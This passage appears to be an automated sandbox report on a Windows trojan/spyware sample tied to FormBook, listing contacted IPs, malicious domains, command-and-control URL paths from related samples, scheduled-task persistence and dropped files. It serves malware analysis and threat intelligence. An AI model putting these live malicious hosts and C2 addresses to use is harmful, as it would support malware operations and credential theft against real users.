                                              https://www.fastmail.help/hc/en-us/articles/1500000280141reg.exe, 00000011.00000002.4130930355.000000000520C000.00000004.10000000.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000017.00000002.4129787142.000000000473C000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.carterandcone.comljlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://ac.ecosia.org/autocomplete?q=reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlNjlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.founder.com.cn/cnjlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/frere-user.htmljlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.fastmailusercontent.com/filestorage/css/main.cssreg.exe, 00000011.00000002.4130930355.000000000520C000.00000004.10000000.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000017.00000002.4129787142.000000000473C000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.com/designers8jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              103.168.172.37
                                              		www.jleabres.comunknown
                                              		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                              216.194.173.237
                                              		mysticriverpath.comUnited States
                                              		22611IMH-WESTUSfalse
                                              38.47.226.116
                                              		wb88.wb-88.comUnited States
                                              		174COGENT-174USfalse
                                              199.59.243.226
                                              		www.orthonow.liveUnited States
                                              		395082BODIS-NJUSfalse
                                              203.161.41.207
                                              		www.soutsour.xyzMalaysia
                                              		45899VNPT-AS-VNVNPTCorpVNtrue
                                              217.160.0.119
                                              		www.qrdinamicos.comGermany
                                              		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                              3.33.130.190
                                              		mscuration.comUnited States
                                              		8987AMAZONEXPANSIONGBtrue
                                              132.226.11.158
                                              		www.hf7777hi.netUnited States
                                              		16989UTMEMUSfalse

                                              General Information

                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1468932
                                              Start date and time:2024-07-08 09:32:05 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 12m 3s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:23
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:3
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:jlsvOH1c8bSRKqM.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@29/16@15/8
                                              EGA Information:
                                              • Successful, ratio: 83.3%
                                              HCA Information:
                                              • Successful, ratio: 91%
                                              • Number of executed functions: 109
                                              • Number of non-executed functions: 300
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              03:32:57API Interceptor1x Sleep call for process: jlsvOH1c8bSRKqM.exe modified
                                              03:32:58API Interceptor41x Sleep call for process: powershell.exe modified
                                              03:33:03API Interceptor1x Sleep call for process: AZJifQrhDpEQCA.exe modified
                                              03:33:51API Interceptor12496220x Sleep call for process: reg.exe modified
                                              08:32:59Task SchedulerRun new task: AZJifQrhDpEQCA path: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              103.168.172.37eNXDCIvEXI.exeGet hashmaliciousFormBookBrowse
                                              • www.celebration24.co.uk/mcz6/
                                              H25iQbxCki.exeGet hashmaliciousFormBookBrowse
                                              • www.celebration24.co.uk/mcz6/
                                              Factura (3).exeGet hashmaliciousFormBookBrowse
                                              • www.celebration24.co.uk/mcz6/
                                              PO0424024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.celebration24.co.uk/pq0o/
                                              199.59.243.226http://sectocarewl.online/mona-michelle/Get hashmaliciousUnknownBrowse
                                              • ww25.watchdirectvplay.com/_tr
                                              http://ww7.eagleget.comGet hashmaliciousUnknownBrowse
                                              • ww7.eagleget.com/_tr
                                              file.exeGet hashmaliciousVidarBrowse
                                              • survey-smiles.com/
                                              CMV610942X6UI.exeGet hashmaliciousFormBookBrowse
                                              • www.mommysdaycare.net/9tym/
                                              AWB NO. 077-57676135055.exeGet hashmaliciousFormBookBrowse
                                              • www.orthonow.live/c7lp/
                                              hOe2JrpIAE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.shopusuniform.com/cn26/?V410V=Wwa2UMOYo9JcJMQ5ME0Q+bO7/4aNL8yaSIJN/NKFPRQQ6eA3A90uIzxodQffq+AadB6M&Kr=YtxTb
                                              factura.exeGet hashmaliciousFormBookBrowse
                                              • www.4cityclean.uno/qpcj/
                                              RSW6103D401005.exeGet hashmaliciousFormBookBrowse
                                              • www.42bomclub.com/zq0e/
                                              82xul16VKj.exeGet hashmaliciousCryptOne, VidarBrowse
                                              • survey-smiles.com/
                                              rPRESUPUESTO.exeGet hashmaliciousFormBookBrowse
                                              • www.mommysdaycare.net/k4dg/
                                              203.161.41.207purchase order_pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.hectmalt.xyz/9ntw/?MdEl=DF4c4jTIr0uCfSFFw8k7okOaWiqusMuq77V3jsF9odELuFK4p5vQm2AEcbSTGQxVKs+ZCGJ5ndNcuFNuj9dUX+A+cKpzBpqYQsgpzguPUBB/nrPxtt52Xac=&cv4D=Bv0xSH88iTF48zS0
                                              Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                                              • www.fardehb.top/q9ar/
                                              PO454355 Pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.marttyes.top/o2rg/
                                              Quotation List Pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.marttyes.top/o2rg/
                                              DHL Receipt_AWB#20240079104.exeGet hashmaliciousFormBookBrowse
                                              • www.mandelmj.top/np46/?3Xd=oST4nP2qn9PKRR23DgE4dZvmjMMxILXYN0NS4qfR16liFnJHfC1ot3bGI9j2UY/L1t0t4iV+0dubbUuy30+ljgzKPo1ECGI4Ndt4a7hacRml4Xnva4zvSFI=&Cdl=szJ4
                                              arrival notice_pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.hectmalt.xyz/9ntw/?CbPtaF=DF4c4jTIr0uCfSFFw8k7okOaWiqusMuq77V3jsF9odELuFK4p5vQm2AEcbSTGQxVKs+ZCGJ5ndNcuFNuj9dUX+A+cKpzBpqYQsgpzguPUBB/nrPxtt52Xac=&NV=CzkTp6UpmNmd
                                              AirWaybill_Document Pdf.exeGet hashmaliciousFormBookBrowse
                                              • www.marttyes.top/o2rg/
                                              HSBC Bank_Approvel Letter.exeGet hashmaliciousFormBookBrowse
                                              • www.marttyes.top/gp5e/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              wb88.wb-88.comhttp://7b7.creatormantra.in/4VScWz2361HCPn207tiaqfwjsxt14569KMNQKWEFGVUGQCK2892PHKG8826G17Get hashmaliciousPhisherBrowse
                                              • 45.76.155.127
                                              Al_Safar_Legal_Notice_PDF.exeGet hashmaliciousFormBookBrowse
                                              • 45.76.179.53
                                              uVk9lgKUxs.exeGet hashmaliciousFormBookBrowse
                                              • 45.76.179.53
                                              load_4.bin.exeGet hashmaliciousFormBookBrowse
                                              • 45.76.179.53
                                              Quotation_PDF.exeGet hashmaliciousFormBookBrowse
                                              • 45.76.179.53
                                              DHL.exeGet hashmaliciousFormBookBrowse
                                              • 45.76.179.53
                                              dutch_94854_0293_invoice_30495.exeGet hashmaliciousFormBookBrowse
                                              • 45.76.179.53
                                              Hesaphareketi-01.exeGet hashmaliciousFormBookBrowse
                                              • 103.107.236.65
                                              Halkbank_Ekstre.exeGet hashmaliciousFormBookBrowse
                                              • 103.107.236.65
                                              www.hf7777hi.netYour file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                                              • 132.226.11.158
                                              www.jleabres.comDHL Receipt_AWB#20240079104.exeGet hashmaliciousFormBookBrowse
                                              • 103.168.172.52
                                              www.qrdinamicos.comYour file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                                              • 217.160.0.119
                                              7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
                                              • 217.160.0.119
                                              www.pu6wac.buzzYour file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                                              • 188.114.97.3
                                              www.orthonow.liveAWB NO. 077-57676135055.exeGet hashmaliciousFormBookBrowse
                                              • 199.59.243.226

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              IMH-WESTUSDHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                              • 216.194.161.167
                                              DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                              • 216.194.161.167
                                              DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                              • 216.194.161.167
                                              DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                              • 216.194.161.167
                                              https://fhdqc8.fi59.fdske.com/ec/gAAAAABmfGZyxTh2_K7pHFLC0GqgMqzWDGy5rzOEXF5rWzzKyIh9SQQExFxMQ4awca19AuE2VvhAc9xMu62rgsB6VoJB4N9_fBGtHi3bqIWidSZzaqe6vAuqfJ2HLS_07LjIIFB3TPyWrVCoDPci0vJbEOdFpQbvgMhQ2bb5wwjc0QCyYMs2huEbMV0bF6VlM0VyKvcYrSXwroV9aI7YNrZVFratXAJOXua81IBgQ_lBlo0qGGQdFoqJacHMDkjGxuYp664Cy1FCW8W0d91K8bj980Cvliw9OLQxlehUsXbXZowsYCsVKv0Fne-F6gv0Krh2AVe-ilbzwDq1zcnJIobjeErIHapsGWTJtbLVauq4zhAsYdUWRkCB9SiulS3R7ML3XCRzZ_QNGet hashmaliciousHTMLPhisherBrowse
                                              • 209.182.194.173
                                              https://fhdqc8.fi59.fdske.com/ec/gAAAAABmfGZyjC4MVZ8WF44ySzBi6efN3zaqod3SxqQ1kDtzYoyQOsWWD19NsGcVNDBcFjl9mUT7fbfISshhTM2Hik02CHjq-9Q67vAot3BfkCz1fsPEPNCf7G7MVRriPpFBDyLvG5wWqHsR-cwOURIaxnerOQ99C00IkC5xo8SyVqmsRm4_h22BEVkgpwhIxN5ZLSZjkxsDiVXWEiomSy9VfeZMSpAZBIiVY5QOn61X75pVs8oUeoKLdPrvk2c30UYd3VO5mnFHavb6nEffGuo1D5oKxYWc0Cn_-p6tPW-P_jOehq5HKz3wTiXh0DEAmqouDGoQMnrEZrqh3uNO8i3DH8OUtiyY0qJrP4tokSeZMhLFcgcGL1rQtDYermPtRGb82rC_qMPluzB5vb8_joMO7PI6RQTXMQ==Get hashmaliciousHTMLPhisherBrowse
                                              • 209.182.194.173
                                              https://fhdqc8.fi59.fdske.com/ec/gAAAAABmfGZyxTh2_K7pHFLC0GqgMqzWDGy5rzOEXF5rWzzKyIh9SQQExFxMQ4awca19AuE2VvhAc9xMu62rgsB6VoJB4N9_fBGtHi3bqIWidSZzaqe6vAuqfJ2HLS_07LjIIFB3TPyWrVCoDPci0vJbEOdFpQbvgMhQ2bb5wwjc0QCyYMs2huEbMV0bF6VlM0VyKvcYrSXwroV9aI7YNrZVFratXAJOXua81IBgQ_lBlo0qGGQdFoqJacHMDkjGxuYp664Cy1FCW8W0d91K8bj980Cvliw9OLQxlehUsXbXZowsYCsVKv0Fne-F6gv0Krh2AVe-ilbzwDq1zcnJIobjeErIHapsGWTJtbLVauq4zhAsYdUWRkCB9SiulS3R7ML3XCRzZ_QNGet hashmaliciousHTMLPhisherBrowse
                                              • 209.182.194.173
                                              http://outselluar.liveGet hashmaliciousUnknownBrowse
                                              • 199.250.212.132
                                              DHL AWB COMMERCAIL INVOICE AND BILL OF LANDING TRACKING DEATAILS.exeGet hashmaliciousAgentTeslaBrowse
                                              • 216.194.161.167
                                              DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                              • 216.194.161.167
                                              COGENT-174US36lO1T5GTG.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 38.58.177.229
                                              PvZTwVx9zC.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 38.58.177.229
                                              Do3To1H4zS.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 38.58.177.229
                                              wYbBsQHoeA.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 38.58.177.229
                                              LViQloRLs6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 38.58.177.229
                                              6iZHkJpypi.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 38.58.177.229
                                              bRYlOlQolq.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 38.58.177.229
                                              X0IuEdDH.exeGet hashmaliciousBlackMoonBrowse
                                              • 206.238.199.40
                                              Tomcat.exeGet hashmaliciousBlackMoonBrowse
                                              • 206.238.199.40
                                              https://www.bzqmgs.com/Get hashmaliciousUnknownBrowse
                                              • 38.174.148.43
                                              BODIS-NJUShttp://sectocarewl.online/mona-michelle/Get hashmaliciousUnknownBrowse
                                              • 199.59.243.226
                                              http://ww7.eagleget.comGet hashmaliciousUnknownBrowse
                                              • 199.59.243.226
                                              file.exeGet hashmaliciousVidarBrowse
                                              • 199.59.243.226
                                              BL Draft.exeGet hashmaliciousFormBookBrowse
                                              • 199.59.243.226
                                              CMV610942X6UI.exeGet hashmaliciousFormBookBrowse
                                              • 199.59.243.226
                                              AWB NO. 077-57676135055.exeGet hashmaliciousFormBookBrowse
                                              • 199.59.243.226
                                              hOe2JrpIAE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • 199.59.243.226
                                              factura.exeGet hashmaliciousFormBookBrowse
                                              • 199.59.243.226
                                              RSW6103D401005.exeGet hashmaliciousFormBookBrowse
                                              • 199.59.243.226
                                              82xul16VKj.exeGet hashmaliciousCryptOne, VidarBrowse
                                              • 199.59.243.226
                                              AARNET-AS-APAustralianAcademicandResearchNetworkAARNepurchase order_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 103.176.91.154
                                              O5JnVwnxEp.rtfGet hashmaliciousUnknownBrowse
                                              • 103.186.67.211
                                              arm7-20240707-0306.elfGet hashmaliciousMiraiBrowse
                                              • 103.182.31.16
                                              SecuriteInfo.com.Other.Malware-gen.348.19428.xlsxGet hashmaliciousUnknownBrowse
                                              • 103.186.67.211
                                              3jI8pe3luL.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              • 103.33.12.74
                                              80TeZdsbeA6B6j4.exeGet hashmaliciousFormBookBrowse
                                              • 103.191.209.34
                                              tYEY1UeurGz0Mjb.exeGet hashmaliciousFormBookBrowse
                                              • 103.8.70.95
                                              0tkRwEewXq.exeGet hashmaliciousFormBookBrowse
                                              • 103.164.62.155
                                              https://www.support.cryptoplanet.in/downloads.phpGet hashmaliciousUnknownBrowse
                                              • 103.180.120.145
                                              95DVgihS4k.elfGet hashmaliciousUnknownBrowse
                                              • 161.50.87.189

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AZJifQrhDpEQCA.exe.log

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jlsvOH1c8bSRKqM.exe.log

                                              Download File
                                              Process:C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:true
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):2232
                                              Entropy (8bit):5.380192968514367
                                              Encrypted:false
                                              SSDEEP:48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:+LHyIFKL3IZ2KRH9Oug8s
                                              MD5:E3EC01FAB7E327602A9550342FA73464
                                              SHA1:7F06C78BA2496A8DDB3DDCD63BAF741CB8C84886
                                              SHA-256:4ECCD285FCD821659092ADB47638B559656F97512183BA76AEE2760D531273C5
                                              SHA-512:B66B707510DE1B0AA29F65F1C99BDEEBDC4D34EC3D9950B62E17058D2E5B1599C85A09EC056F1C4BCE019213485F1E3D7E9D68651890A853819F98DBF2492407
                                              Malicious:false
                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                              C:\Users\user\AppData\Local\Temp\-02n08K

                                              Download File
                                              Process:C:\Windows\SysWOW64\reg.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                              Category:dropped
                                              Size (bytes):114688
                                              Entropy (8bit):0.9746603542602881
                                              Encrypted:false
                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                              Malicious:false
                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1251ihjw.00i.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4h0posrp.2yj.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fkruzws.4i4.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gaxg3j5b.p0n.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0d3oa5k.v52.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
